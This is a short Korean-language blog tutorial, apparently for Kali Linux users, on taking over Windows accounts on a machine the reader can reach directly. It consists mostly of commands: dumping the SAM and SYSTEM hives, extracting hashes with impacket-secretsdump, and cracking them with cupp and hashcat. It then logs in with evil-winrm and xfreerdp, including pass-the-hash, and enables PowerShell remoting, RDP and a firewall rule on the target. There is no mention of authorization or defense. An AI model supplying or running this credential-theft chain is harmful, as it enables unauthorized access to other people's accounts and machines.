Security

How to Get Windows Account

How to Get Windows Account

아래 방법은 target pc에 직접 접근 가능할때 사용할수 있는 방법이다.

cmd.exe 를 관리자 권한으로 실행 시키자.

Copy
reg save HKLM\sam ./sam.save
reg save HKLM\system ./system.save

저장된 sam.save 와 system.save 를 칼리 리눅스로 가져가자.

칼리 리눅스에서 다음 명령어를 실행하자.

Copy
impacket-secretsdump -sam sam.save -system system.save LOCAL  

화면에 사용자 비번과 hash 값이 출력된다.

Test Image

hash 값을 file 에 저장하자.

Copy
nano hashes.txt 

패스워드 사전파일을 만들어주는 cupp를 아래 그림처럼 설치하자.

Test Image

Copy
cupp -i

Test Image

Copy
hashcat -m 1000 hashes.txt yoon.txt
hashcat -m 1000 hashes.txt yoon.txt --show

계정을 탈취하면 다음과 같은 공격을 생각해 볼수 있다.

Copy
evil-winrm -i 192.168.50.11 -u netwa -p password

evil-winrm 으로 접속하려면 target pc 에 설정을 해야 한다.
Copy
Set-NetConnectionProfile -NetworkCategory Private
Enable-PSRemoting -Force

위에 명령은 power shell 관리자 권한이 필요하다. 참고로 윈도우 방화벽은 관계가 없다.

rdp 를 이용할수도 있다.
Copy
xfreerdp /v:192.168.50.11 /u:netwa /p:password

rdp는 윈도우 에서 원격 연결 허용을 하고 방화벽 예외를 적용해야 한다.

아래는 rdp를 허용 하는 명령어 이다.

Copy
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

아래는 방화벽 규칙을 추가하는 명령어 이다.
Copy
New-NetFirewallRule -DisplayName "Remote Desktop" -Direction Inbound -Action Allow -Protocol TCP -LocalPort 3389

만약 password 크랙킹에 실패하면 다음과 같이 해쉬값을 이용하는 방법도 있다.
Copy
evil-winrm -i 192.168.50.11 -u netwa -H 3661e40638bb6603f1d22ff18dde88d4
Copy
xfreerdp /v:192.168.50.11 /u:netwa /pth:3661e40638bb6603f1d22ff18dde88d4  

참고로 xfreerdp는 evil-winrm와 달리 사용자 비번이 설정되 있지 않은 상태에서 빈 해쉬값으로 로그인 하면 연결이 안된다.

Reference